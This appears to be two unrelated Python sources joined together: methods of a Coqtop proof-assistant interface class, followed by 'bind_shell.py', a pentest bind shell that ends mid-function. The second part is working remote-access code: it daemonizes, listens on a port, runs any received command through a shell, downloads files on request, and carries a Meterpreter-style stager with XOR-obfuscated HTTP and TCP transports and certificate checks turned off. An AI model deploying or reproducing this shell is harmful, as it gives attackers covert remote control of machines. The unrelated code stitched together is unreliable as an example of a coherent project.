def rewind(self, steps: int = 1) -> Tuple[bool, str, Optional[int], str]:
"""Go back 'steps' states."""
assert self.xml is not None
self.logger.debug("rewind: %d", steps)
if steps > len(self.states):
self.state_id = self.root_state
self.states = []
steps = len(self.states)
else:
# In 8.4 query and option commands will be recorded with
# state_id = -1. Need to count them and reduce number of steps to
# rewind so Coqtop doesn't go too far back
fake_steps = sum(s == -1 for s in self.states[-steps:])
if self.states[-steps] != -1:
self.state_id = self.states[-steps]
else:
self.state_id = 0
self.states = self.states[:-steps]
steps -= fake_steps
response, err = self.call(self.xml.edit_at(self.state_id, steps))
return (
isinstance(response, Ok),
response.msg,
response.val if isinstance(response, Ok) else None,
err,
)
def query(
self,
cmd: str,
in_script: bool,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Query Coqtop with 'cmd'."""
assert self.xml is not None
self.logger.debug("query: %s", cmd)
response, err = self.call(
self.xml.query(cmd, self.state_id, encoding=encoding),
timeout=timeout,
)
if isinstance(response, Ok) and in_script:
# If the query was called from within the script we need to record
# the state id so rewinding will work properly. Since 8.4 uses
# number of steps rather than state ids, record '-1' to indicate
# that no rewind should actually be done
if self.xml.version >= (8, 5, 0):
self.states.append(self.state_id)
else:
self.states.append(-1)
return (
isinstance(response, Ok),
response.msg,
None if isinstance(response, Ok) else response.loc,
err,
)
def goals(
self,
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Goals], str]:
"""Get the current set of hypotheses and goals."""
assert self.xml is not None
self.logger.debug("goals")
response, err = self.call(self.xml.goal(), timeout=timeout)
return (
isinstance(response, Ok),
response.msg,
response.val if isinstance(response, Ok) else None,
err,
)
def do_option(
self,
cmd: str,
in_script: bool,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Set or get an option."""
assert self.xml is not None
self.logger.debug("do_option: %s", cmd)
vals, opt = self.xml.parse_option(cmd)
if vals is None:
response, err = self.call(
self.xml.get_options(encoding=encoding),
timeout=timeout,
)
if isinstance(response, Ok):
optval = [
(val, desc) for name, desc, val in response.val if name == opt
]
if optval != []:
ret = f"{optval[0][1]}: {optval[0][0]}"
else:
ret = "Invalid option name"
else:
errs = []
for val in vals:
response, err = self.call(
self.xml.set_options(opt, val, encoding=encoding),
timeout=timeout,
)
ret = response.msg
errs.append(err)
if isinstance(response, Ok):
break
err = "".join(errs)
if isinstance(response, Ok) and in_script:
# Hack to associate setting an option with a new state id by
# executing a noop so it works correctly with rewinding
if in_script:
success, _, _, _ = self.advance(self.xml.noop, encoding)
assert success
return (
isinstance(response, Ok),
ret if isinstance(response, Ok) else response.msg,
None if isinstance(response, Ok) else response.loc,
err,
)
def dispatch(
self,
cmd: str,
cmd_no_comment: Optional[str] = None,
in_script: bool = True,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Decide whether 'cmd' is setting/getting an option, a query, or a
regular command.
"""
# pylint: disable=no-else-return
assert self.xml is not None
if cmd_no_comment is None:
cmd_no_comment = cmd
if self.xml.is_option(cmd_no_comment):
return self.do_option(cmd_no_comment, in_script, encoding, timeout)
elif self.xml.is_query(cmd_no_comment):
return self.query(cmd, in_script, encoding, timeout)
elif in_script:
return self.advance(cmd, encoding, timeout)
else:
return True, "Command only allowed in script.", None, ""
# Interacting with Coqtop #
def call(
self,
cmdtype_msg: Tuple[str, Optional[bytes]],
timeout: Optional[int] = None,
) -> Tuple[Result, str]:
"""Send 'msg' to the Coqtop process and wait for the response."""
assert self.xml is not None
# Check if Coqtop has stopped
if not self.running():
raise CoqtopError("Coqtop is not running.")
# Throw away any unread messages
self.empty_out()
# 'msg' can be None if a command does not exist for a particular
# version and is being faked.
# NOTE: It is important that the '_standardize' function being called
# does not depend on the value it is passed since it is None
cmd, msg = cmdtype_msg
if msg is None:
return self.xml.standardize(cmd, Ok(None)), self.collect_err()
# Don't bother doing prettyxml if debugging isn't on
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug(prettyxml(msg))
self.send_cmd(msg)
with futures.ThreadPoolExecutor(1) as pool:
try:
timeout = timeout if timeout != 0 else None
response, err = pool.submit(self.get_answer).result(timeout)
except futures.TimeoutError:
self.interrupt()
response, err = TIMEOUT_ERR, ""
return self.xml.standardize(cmd, response), err
def get_answer(self) -> Tuple[Result, str]:
"""Read from 'out_q' and wait until a full response is received."""
assert self.xml is not None
data = []
poll_sec = 1
while True:
# Abort if an error is printed to stderr, but ignore warnings.
# NOTE: If `warnings_wf` is False because this version of Coq does
# not follow the pattern expected by `partition_warnings` then
# pretend everything is a warning and hope for the best.
err = self.collect_err()
if self.xml.warnings_wf and partition_warnings(err)[1] != "":
return UNEXPECTED_ERR, err
try:
data.append(self.out_q.get(timeout=poll_sec))
except Empty:
continue
xml = b"".join(data)
if not self.xml.worth_parsing(xml):
continue
response = self.xml.raw_response(xml)
if response is None:
continue
# Don't bother doing prettyxml if debugging isn't on
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug(prettyxml(b"<response>" + xml + b"</response>"))
return response, err
@staticmethod
def drain_queue(q: BytesQueue) -> Iterator[bytes]:
"""Yield data from 'q' until it is empty."""
while not q.empty():
try:
yield q.get_nowait()
except Empty:
return
def empty_out(self) -> None:
"""Pop data until 'out_q' is empty."""
for _ in Coqtop.drain_queue(self.out_q):
pass
def collect_err(self) -> str:
"""Pop and concatenate everything in 'err_q'."""
err = b"".join(Coqtop.drain_queue(self.err_q)).decode("utf-8")
if err != "":
self.logger.debug(err)
return err
def capture_out(self, buffer: BytesQueue, stream: IO[bytes]) -> None:
"""Continually read data from 'stream' into 'buffer'."""
while not self.stopping:
try:
buffer.put(stream.read(0x10000))
except (AttributeError, OSError, ValueError):
# Coqtop died
return
def capture_dead(self) -> None:
"""Continually check if Coqtop has died."""
while self.running():
time.sleep(1)
self.stop()
def send_cmd(self, cmd: bytes) -> None:
"""Write to Coqtop's stdin."""
if self.coqtop is None:
raise CoqtopError("coqtop must not be None in send_cmd()")
if self.coqtop.stdin is None:
raise CoqtopError("coqtop stdin must not be None in send_cmd()")
self.coqtop.stdin.write(cmd)
self.coqtop.stdin.flush()
def interrupt(self) -> None:
"""Send a SIGINT signal to Coqtop."""
if self.coqtop is None:
raise CoqtopError("Coqtop is not running.")
self.coqtop.send_signal(signal.SIGINT)
# Current State #
def running(self) -> bool:
"""Check if Coqtop has already been started."""
return self.coqtop is not None and self.coqtop.poll() is None
# Debugging #
def toggle_debug(self) -> Optional[str]:
"""Enable or disable logging of debug messages."""
self.logger.removeHandler(self.handler)
self.handler.flush()
self.handler.close()
if self.log is None:
# Create unique log file
fmt = logging.Formatter("%(asctime)s: %(message)s")
self.log = NamedTemporaryFile( # pylint: disable=consider-using-with
mode="w",
prefix=f"coqtop_{datetime.datetime.now().strftime('%y%m%d_%H%M%S')}_",
delete=False,
)
self.handler = logging.StreamHandler(self.log)
self.handler.setFormatter(fmt)
self.logger.addHandler(self.handler)
self.logger.setLevel(logging.DEBUG)
else:
# Clean up old logging
self.log.close()
# Set to null logging
self.log = None
self.handler = logging.NullHandler()
self.logger.addHandler(self.handler)
self.logger.setLevel(logging.CRITICAL)
return self.log.name if self.log is not None else None
|
bind_shell.py
|
#!/usr/bin/env python
#**************************************************************************#
# Filename: py_bind_shel.py (Created: 2016-08-14) #
# (Updated: 2016-10-02) #
# Info: #
# TBG Security Python BIND Shell for pentest #
# Author: #
# Ryan Hays #
#**************************************************************************#
import binascii
import code
import os
import platform
import random
import re
import select
import socket
import struct
import subprocess
import sys
import threading
import time
import traceback
import thread
import urllib2
UMASK = 0
WORKDIR = "/"
MAXFD = 1024
try:
SHELLTYPE = sys.argv[1]
except IndexError:
SHELLTYPE = 'std'
try:
BINDPORT = int(sys.argv[2])
except IndexError:
BINDPORT = 8888
if hasattr(os, "devnull"):
REDIRECT_TO = os.devnull
else:
REDIRECT_TO = "/dev/null"
def createdaemon():
try:
pid = os.fork()
except OSError, e:
raise Exception, "%s [%d]" % (e.strerror, e.errno)
if pid == 0: # The first child.
os.setsid()
try:
pid = os.fork() # Fork a second child.
except OSError, e:
raise Exception, "%s [%d]" % (e.strerror, e.errno)
if pid == 0: # The second child.
os.chdir(WORKDIR)
os.umask(UMASK)
else:
os._exit(0) # Exit parent (the first child) of the second child.
else:
os._exit(0) # Exit parent of the first child.
import resource # Resource usage information.
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if maxfd == resource.RLIM_INFINITY:
maxfd = MAXFD
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
os.open(REDIRECT_TO, os.O_RDWR) # standard input (0)
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2) # standard error (2)
return (0)
def connection(conn):
conn.setblocking(1)
conn.send('Connection Established!')
while True:
conn.send('\n$')
data = conn.recv(1024)
if data.strip('\r\n') == 'quit' or data.strip('\r\n') == 'exit':
conn.close()
break
elif data.strip('\r\n').startswith('cd'):
try:
os.chdir(data.strip('\r\n')[3:])
except:
conn.send('The system path cannot be found!')
elif data.strip('\r\n').startswith('wget'):
try:
f = open(os.path.basename(data[5:]), "wb")
f.write(urllib2.urlopen(data[5:]))
f.close()
conn.send("Successfully downloaded %s" % os.path.basename(data[5:]))
except:
conn.send("Download failed!")
else:
proc = subprocess.Popen(data.strip('\r\n'), shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdoutput = proc.stdout.read() + proc.stderr.read()
conn.send(stdoutput)
if __name__ == "__main__":
retCode = createdaemon()
procParams = """
return code = %s
process ID = %s
parent process ID = %s
process group ID = %s
session ID = %s
user ID = %s
effective user ID = %s
real group ID = %s
effective group ID = %s
""" % (retCode, os.getpid(), os.getppid(), os.getpgrp(), os.getsid(0),
os.getuid(), os.geteuid(), os.getgid(), os.getegid())
if SHELLTYPE.lower() == 'std':
while True:
try:
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', BINDPORT))
s.listen(5)
while True:
s.settimeout(2)
try:
conn, addr = s.accept()
except socket.timeout:
continue
if conn:
s.settimeout(None)
thread.start_new_thread(connection, (conn,))
except:
pass
elif SHELLTYPE.lower() == 'msf':
try:
import ctypes
except ImportError:
has_windll = False
else:
has_windll = hasattr(ctypes, 'windll')
try:
urllib_imports = ['ProxyHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
if sys.version_info[0] < 3:
urllib = __import__('urllib2', fromlist=urllib_imports)
else:
urllib = __import__('urllib.request', fromlist=urllib_imports)
except ImportError:
has_urllib = False
else:
has_urllib = True
if sys.version_info[0] < 3:
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
else:
if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
# reseed the random generator.
random.seed()
#
# Constants
#
# these values will be patched, DO NOT CHANGE THEM
DEBUGGING = False
HTTP_CONNECTION_URL = None
HTTP_PROXY = None
HTTP_USER_AGENT = None
PAYLOAD_UUID = '4ac742fe5c99f0c1a1e4b4f0f6152f24'
SESSION_COMMUNICATION_TIMEOUT = 300
SESSION_EXPIRATION_TIMEOUT = 604800
SESSION_RETRY_TOTAL = 3600
SESSION_RETRY_WAIT = 10
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
ERROR_FAILURE_PYTHON = 2
ERROR_FAILURE_WINDOWS = 3
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = (0)
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1 << 31) + (1 << 30) + (1 << 29) + (1 << 19) + (1 << 18) + (1 << 17) + (1 << 16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431
TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
EXPORTED_SYMBOLS = {}
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
def rand_byte():
return chr(random.randint(1, 255))
def rand_xor_key():
return ''.join(rand_byte() for _ in range(4))
def xor_bytes(key, data):
return ''.join(chr(ord(data[i]) ^ ord(key[i % len(key)])) for i in range(len(data)))
def export(symbol):
EXPORTED_SYMBOLS[symbol.__name__] = symbol
return symbol
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in range(32))
@export
def crc16(data):
poly = 0x1021
reg = 0x0000
if is_str(data):
data = list(map(ord, data))
elif is_bytes(data):
data = list(data)
data.append(0)
data.append(0)
for byte in data:
mask = 0x80
while mask > 0:
reg <<= 1
if byte & mask:
reg += 1
mask >>= 1
if reg > 0xffff:
reg &= 0xffff
reg ^= poly
return reg
@export
def error_result(exception=None):
if not exception:
_, exception, _ = sys.exc_info()
exception_crc = crc16(exception.__class__.__name__)
if exception_crc == 0x4cb2: # WindowsError
return error_result_windows(exception.errno)
else:
result = ((exception_crc << 16) | ERROR_FAILURE_PYTHON)
return result
@export
def error_result_windows(error_number=None):
if not has_windll:
return ERROR_FAILURE
if error_number == None:
error_number = ctypes.windll.kernel32.GetLastError()
if error_number > 0xffff:
return ERROR_FAILURE
result = ((error_number << 16) | ERROR_FAILURE_WINDOWS)
return result
@export
def get_hdd_label():
for _, _, files in os.walk('/dev/disk/by-id/'):
for f in files:
for p in ['ata-', 'mb-']:
if f[:len(p)] == p:
return f[len(p):]
return ''
@export
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress),
ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
@export
def packet_enum_tlvs(pkt, tlv_type=None):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset + 8])
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
val = pkt[offset + 8:(offset + 8 + (tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = str(val.split(NULL_BYTE, 1)[0])
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
val = struct.unpack('>Q', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type': tlv[1], 'length': tlv[0], 'value': val}
offset += tlv[0]
raise StopIteration()
@export
def packet_get_tlv(pkt, tlv_type):
try:
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
except IndexError:
return {}
return tlv
@export
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type': args[0], 'value': args[1]}
else:
tlv = args[0]
data = ''
value = tlv['value']
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
if isinstance(value, float):
value = int(round(value))
data = struct.pack('>III', 12, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
data = struct.pack('>IIQ', 16, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8')
else:
if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
value = value.encode('UTF-8')
elif not is_bytes(value):
value = bytes(value, 'UTF-8')
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
return data
@export
def tlv_pack_response(result, response):
response += tlv_pack(TLV_TYPE_RESULT, result)
response = struct.pack('>I', len(response) + 4) + response
return response
# @export
class MeterpreterFile(object):
def __init__(self, file_obj):
self.file_obj = file_obj
def __getattr__(self, name):
return getattr(self.file_obj, name)
export(MeterpreterFile)
# @export
class MeterpreterSocket(object):
def __init__(self, sock):
self.sock = sock
def __getattr__(self, name):
return getattr(self.sock, name)
export(MeterpreterSocket)
# @export
class MeterpreterSocketClient(MeterpreterSocket):
pass
export(MeterpreterSocketClient)
# @export
class MeterpreterSocketServer(MeterpreterSocket):
pass
export(MeterpreterSocketServer)
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = bytes()
self.data_lock = threading.RLock()
def run(self):
for byte in iter(lambda: self.std.read(1), bytes()):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
def peek(self, l=None):
data = bytes()
self.data_lock.acquire()
if l == None:
data = self.data
else:
data = self.data[0:l]
self.data_lock.release()
return data
def read(self, l=None):
self.data_lock.acquire()
data = self.peek(l)
self.data = self.data[len(data):]
self.data_lock.release()
return data
# @export
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
subprocess.Popen.__init__(self, *args, **kwargs)
self.echo_protection = False
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
self.stderr_reader.start()
def write(self, channel_data):
self.stdin.write(channel_data)
self.stdin.flush()
if self.echo_protection:
end_time = time.time() + 0.5
out_data = bytes()
while (time.time() < end_time) and (out_data != channel_data):
if self.stdout_reader.is_read_ready():
out_data = self.stdout_reader.peek(len(channel_data))
if out_data == channel_data:
self.stdout_reader.read(len(channel_data))
export(STDProcess)
class Transport(object):
def __init__(self):
self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
self.communication_last = 0
self.retry_total = SESSION_RETRY_TOTAL
self.retry_wait = SESSION_RETRY_WAIT
self.request_retire = False
def __repr__(self):
return "<{0} url='{1}' >".format(self.__class__.__name__, self.url)
@property
def communication_has_expired(self):
return self.communication_last + self.communication_timeout < time.time()
@property
def should_retire(self):
return self.communication_has_expired or self.request_retire
@staticmethod
def from_request(request):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if url.startswith('tcp'):
transport = TcpTransport(url)
elif url.startswith('http'):
proxy = packet_get_tlv(request, TLV_TYPE_TRANS_PROXY_HOST).get('value')
user_agent = packet_get_tlv(request, TLV_TYPE_TRANS_UA).get('value', HTTP_USER_AGENT)
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent)
transport.communication_timeout = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value',
SESSION_COMMUNICATION_TIMEOUT)
transport.retry_total = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value',
SESSION_RETRY_TOTAL)
transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value',
SESSION_RETRY_WAIT)
return transport
def _activate(self):
return True
def activate(self):
end_time = time.time() + self.retry_total
while time.time() < end_time:
try:
activate_succeeded = self._activate()
except:
activate_succeeded = False
if activate_succeeded:
self.communication_last = time.time()
return True
time.sleep(self.retry_wait)
return False
def _deactivate(self):
return
def deactivate(self):
try:
self._deactivate()
except:
pass
self.communication_last = 0
return True
def get_packet(self):
self.request_retire = False
try:
pkt = self._get_packet()
except:
return None
if pkt is None:
return None
self.communication_last = time.time()
return pkt
def send_packet(self, pkt):
self.request_retire = False
try:
xor_key = rand_xor_key()
raw = xor_key[::-1] + xor_bytes(xor_key, pkt)
self._send_packet(raw)
except:
return False
self.communication_last = time.time()
return True
def tlv_pack_timeouts(self):
response = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_TOTAL, self.retry_total)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait)
return response
def tlv_pack_transport_group(self):
trans_group = tlv_pack(TLV_TYPE_TRANS_URL, self.url)
trans_group += self.tlv_pack_timeouts()
return trans_group
class HttpTransport(Transport):
def __init__(self, url, proxy=None, user_agent=None):
super(HttpTransport, self).__init__()
opener_args = []
scheme = url.split(':', 1)[0]
if scheme == 'https' and (
(sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)):
import ssl
ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
if proxy:
opener_args.append(urllib.ProxyHandler({scheme: proxy}))
self.proxy = proxy
opener = urllib.build_opener(*opener_args)
if user_agent:
opener.addheaders = [('User-Agent', user_agent)]
self.user_agent = user_agent
urllib.install_opener(opener)
self.url = url
self._http_request_headers = {'Content-Type': 'application/octet-stream'}
self._first_packet = None
self._empty_cnt = 0
def _activate(self):
return True
self._first_packet = None
packet = self._get_packet()
if packet is None:
return False
self._first_packet = packet
return True
def _get_packet(self):
if self._first_packet:
packet = self._first_packet
self._first_packet = None
return packet
packet = None
xor_key = None
request = urllib.Request(self.url, None, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
packet = url_h.read()
for _ in range(1):
if packet == '':
break
if len(packet) < 12:
packet = None # looks corrupt
break
xor_key = packet[:4][::-1]
header = xor_bytes(xor_key, packet[4:12])
pkt_length, _ = struct.unpack('>II', header)
if len(packet) - 4 != pkt_length:
packet = None # looks corrupt
if not packet:
delay = 10 * self._empty_cnt
if self._empty_cnt >= 0:
delay *= 10
self._empty_cnt += 1
time.sleep(float(min(10000, delay)) / 1000)
return packet
self._empty_cnt = 0
return xor_bytes(xor_key, packet[12:])
def _send_packet(self, packet):
request = urllib.Request(self.url, packet, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
response = url_h.read()
def patch_uri_path(self, new_path):
match = re.match(r'https?://[^/]+(/.*$)', self.url)
if match is None:
return False
self.url = self.url[:match.span(1)[0]] + new_path
return True
def tlv_pack_transport_group(self):
trans_group = super(HttpTransport, self).tlv_pack_transport_group()
if self.user_agent:
trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent)
if self.proxy:
trans_group += tlv_pack(TLV_TYPE_TRANS_PROXY_HOST, self.proxy)
return trans_group
class TcpTransport(Transport):
def __init__(self, url, socket=None):
super(TcpTransport, self).__init__()
self.url = url
self.socket = socket
self._cleanup_thread = None
self._first_packet = True
def _sock_cleanup(self, sock):
remaining_time = self.communication_timeout
while remaining_time > 0:
iter_start_time = time.time()
if select.select([sock], [], [], remaining_time)[0]:
if len(sock.recv(4096)) == 0:
break
remaining_time -= time.time() - iter_start_time
sock.close()
def _activate(self):
address, port = self.url[6:].rsplit(':', 1)
port = int(port.rstrip('/'))
timeout = max(self.communication_timeout, 30)
if address in ('', '0.0.0.0', '::'):
try:
server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.bind(('', port))
server_sock.listen(1)
if not select.select([server_sock], [], [], timeout)[0]:
server_sock.close()
return False
sock, _ = server_sock.accept()
server_sock.close()
else:
if ':' in address:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((address, port))
sock.settimeout(None)
self.socket = sock
self._first_packet = True
return True
def _deactivate(self):
cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,))
cleanup.run()
self.socket = None
def _get_packet(self):
first = self._first_packet
self._first_packet = False
if not select.select([self.socket], [], [], 0.5)[0]:
return ''
packet = self.socket.recv(12)
if packet == '': # remote is closed
self.request_retire = True
return None
if len(packet) != 12:
if first and len(packet) == 4:
received = 0
header = packet[:4]
pkt_length = struct.unpack('>I', header)[0]
self.socket.settimeout(max(self.communication_timeout, 30))
